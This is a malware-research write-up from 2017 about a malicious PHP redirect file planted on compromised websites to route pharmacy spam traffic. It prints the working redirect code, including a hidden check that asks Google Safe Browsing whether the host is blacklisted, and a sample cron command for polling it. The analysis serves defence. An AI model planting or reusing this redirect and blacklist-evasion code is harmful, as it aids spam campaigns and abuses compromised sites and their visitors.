Checking blacklisted domains or IP for spamming

  • February 8, 2017
Labs Note

Often times we will encounter websites that have been injected with a redirect and these can vary from blackhat SEO tactics for boosting domain rankings all the way to phishing pages trying to steal login credentials. In this case, the redirect was contained within random alphanumerically named PHP files and it redirected visitors to the specified files and then to a pharmacy spam website that contained all of the drug names that you will commonly see in your emails located within your spam folder. This seems to indicate that the attacker was spamming from other third-party servers and within the pharmacy spam email they would include the URLs to the malicious file on our client’s web server. Let us analyze parts of this malicious file:

if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}}header('Location: http://[malicious domain]/');

The payload that is delivered to an unsuspecting visitor is a browser redirect in the form of the ‘header’ PHP function to a malicious domain. This same malicious file with the redirect will be placed on multiple websites that have been compromised already, then the attacker will direct traffic via hyperlinks in the outgoing spam emails to the compromised websites hosting the malicious file with the redirect. The goal of the attacker is to try and trick spam filters by using legitimate websites that have been compromised and contain the malicious redirect instead of using their actual pharmacy spam website within the spam email. If they did include their pharmacy spam website URL directly in the outgoing spam emails, then it would not be long until the spam filters (i.e Spamhaus) blacklist the entire domain name of the pharmacy spam website.

Another problem is that if the compromised websites, or their hosting IPs, become blacklisted then it will be detected by spam filters and also prevent delivery of the spam email due to them containing blacklisted content.

This means that the hacker will want to be able to regularly check upon the referring websites that contain the malicious redirect file and determine whether they have become blacklisted or not. In this specific malicious file, the blacklist checks were triggered through a $_GET request to the malicious file with a specified URL parameter. After such a request is received, it will trigger the PHP file to use the file_get_content function to obtain the output of the text version of Google SafeBrowsing Diagnostics page.

if($_GET['mod']){if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){$g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');

Once a compromised referring website shows as blacklisted, or its hosting IP shows as blacklisted, then the hacker can stop redirecting from that domain or IP to prevent any negative impacts on their targeted domain.

As mentioned earlier, there are usually many compromised websites being used to refer/redirect to the targeted domain, and so to be efficient along with automating tasks; the attacker will then create a cron job or other scheduled task to send the $_GET request to the malicious file and based upon the returned HTTP code they will be able to determine whether the website or hosting IP address has been blacklisted. If it returns a 202 HTTP code when the cron job executes the $_GET request with the necessary URL parameter, then that means it is blacklisted by Google. Often times these cron jobs will output the results of the $_GET request into a file so it can be monitored over a period of time, but by default the cron job will send an email to the configured email address after each time the cron runs. Below is an example of such a cron job that runs every minute and stores the specific numerical HTTP code from the $_GET sent to the malicious redirect file on the compromised website:

# crontab -l* * * * * curl -sD - "http://localhost/malware.php?mod=00X" | grep HTTP | awk '{print $2}' > /tmp/http.txt

The following coding excerpt from the malicious redirect file shows how the script will immediately exit/terminate if it responds to a $_GET request with the HTTP code 202, which means there is a blacklisting active:

$g_sch = str_replace('"listed"', '', $g_sch, $g_out);if($g_out){header('HTTP/1.1 202');exit;}}}

The automated blacklist checking helps the attacker by allowing them to avoid sending their spam emails with blacklisted domains or blacklisted IP addresses as they are well aware that this curtails upon their redirect success rate.

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like